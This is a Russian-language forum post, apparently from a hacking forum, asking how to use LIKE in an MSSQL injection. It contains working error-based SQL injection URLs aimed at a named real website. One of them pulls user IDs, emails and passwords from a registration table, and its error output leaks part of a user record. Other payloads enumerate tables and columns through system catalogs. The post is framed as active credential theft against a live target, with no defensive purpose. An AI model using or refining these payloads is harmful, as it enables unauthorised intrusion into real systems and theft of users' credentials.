вопрос по mssql inj

Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе

я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д

как получить структуру, колонки и содержимое таблиц я знаю
но вот с LIKE у меня не получается не могу понять почему

чтобы было понятнее я хочу рассмотреть на примере

HTML:

http://www.piaggio.com/info.asp?BR=GILERA&CD='

есть инъекция

HTML:

http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(userid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20as%20nvarchar)%20from%20Piaggio..tbSSORegistration%20where%20userid%3E1)--

Conversion failed when converting the nvarchar value '[email protected].~???......................' to data type int.

в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword

пробую через LIKE вывести имя таблицы в которой есть колонка email

HTML:

http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--  

выводит
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

пробовал указать базу

HTML:

http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--

пробовал и так

HTML:

http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25email%25')--

подскажите плз кто знает как правильно запрос составить с LIKE